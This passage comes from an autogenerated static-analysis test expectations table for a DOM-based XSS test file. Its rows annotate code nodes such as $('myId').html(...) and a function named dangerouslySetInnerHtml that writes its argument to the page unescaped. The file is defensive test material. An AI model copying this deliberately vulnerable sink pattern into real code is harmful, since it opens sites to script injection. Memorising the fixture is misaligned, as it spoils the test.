element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:9 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:9 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:14 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:14 | $('myId').html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:14 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:33 | $('myId ... ar()))) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:33 | $('myId ... ar()))) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:33 | $('myId ... ar()))) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:33 | exceptional return of $('myId ... ar()))) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:33 | exceptional return of $('myId ... ar()))) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:1:58:33 | exceptional return of $('myId ... ar()))) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:58:3:58:8 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:58:3:58:8 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:58:3:58:8 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:58:3:58:8 | 'myId' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:58:3:58:8 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:11:58:14 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:11:58:14 | html | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:11:58:14 | html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:16:58:19 | wrap | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:16:58:19 | wrap | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:16:58:19 | wrap | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:16:58:32 | exceptional return of wrap(chop(bar())) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:16:58:32 | exceptional return of wrap(chop(bar())) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:16:58:32 | exceptional return of wrap(chop(bar())) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:58:16:58:32 | wrap(chop(bar())) | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:58:16:58:32 | wrap(chop(bar())) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:58:16:58:32 | wrap(chop(bar())) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:58:16:58:32 | wrap(chop(bar())) | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:58:16:58:32 | wrap(chop(bar())) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:21:58:24 | chop | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:21:58:24 | chop | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:21:58:24 | chop | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:21:58:31 | chop(bar()) | CalleeFlexibleAccessPath | wrap | +| autogenerated/Xss/DomBasedXss/tst.js:58:21:58:31 | chop(bar()) | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:58:21:58:31 | chop(bar()) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:21:58:31 | chop(bar()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:21:58:31 | chop(bar()) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:21:58:31 | exceptional return of chop(bar()) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:21:58:31 | exceptional return of chop(bar()) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:21:58:31 | exceptional return of chop(bar()) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:26:58:28 | bar | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:26:58:28 | bar | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:26:58:28 | bar | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:26:58:30 | bar() | CalleeFlexibleAccessPath | chop | +| autogenerated/Xss/DomBasedXss/tst.js:58:26:58:30 | bar() | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:58:26:58:30 | bar() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:26:58:30 | bar() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:26:58:30 | bar() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:58:26:58:30 | exceptional return of bar() | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:58:26:58:30 | exceptional return of bar() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:58:26:58:30 | exceptional return of bar() | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:60:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:60:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:60:0 | this | enclosingFunctionBody | s $ myId html s | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:60:0 | this | enclosingFunctionName | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:60:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | 'arguments' object of function dangerouslySetInnerHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | 'arguments' object of function dangerouslySetInnerHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | 'arguments' object of function dangerouslySetInnerHtml | enclosingFunctionBody | s $ myId html s | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | 'arguments' object of function dangerouslySetInnerHtml | enclosingFunctionName | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | 'arguments' object of function dangerouslySetInnerHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | exceptional return of function dangerouslySetInnerHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | exceptional return of function dangerouslySetInnerHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | exceptional return of function dangerouslySetInnerHtml | enclosingFunctionBody | s $ myId html s | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | exceptional return of function dangerouslySetInnerHtml | enclosingFunctionName | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | exceptional return of function dangerouslySetInnerHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | functio ... l(s);\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | functio ... l(s);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | functio ... l(s);\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | return of function dangerouslySetInnerHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | return of function dangerouslySetInnerHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | return of function dangerouslySetInnerHtml | enclosingFunctionBody | s $ myId html s | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | return of function dangerouslySetInnerHtml | enclosingFunctionName | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:60:1:63:1 | return of function dangerouslySetInnerHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:60:10:60:32 | dangero ... nerHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:60:10:60:32 | dangero ... nerHtml | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:60:10:60:32 | dangero ... nerHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:60:10:60:32 | dangerouslySetInnerHtml | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:60:10:60:32 | dangerouslySetInnerHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:60:10:60:32 | dangerouslySetInnerHtml | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:60:34:60:34 | s | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:60:34:60:34 | s | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:60:34:60:34 | s | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:60:34:60:34 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:60:34:60:34 | s | enclosingFunctionBody | s $ myId html s | +| autogenerated/Xss/DomBasedXss/tst.js:60:34:60:34 | s | enclosingFunctionBody | s $ myId html s | +| autogenerated/Xss/DomBasedXss/tst.js:60:34:60:34 | s | enclosingFunctionName | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:60:34:60:34 | s | enclosingFunctionName | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:60:34:60:34 | s | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:60:34:60:34 | s | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:3 | $ | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:3 | $ | enclosingFunctionBody | s $ myId html s | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:3 | $ | enclosingFunctionName | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:11 | $('myId') | contextSurroundingFunctionParameters | (s) | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:11 | $('myId') | enclosingFunctionBody | s $ myId html s | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:11 | $('myId') | enclosingFunctionName | dangerouslySetInnerHtml | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:62:3:62:11 | exceptional return of $('myId') | contextFunctionInterfaces | 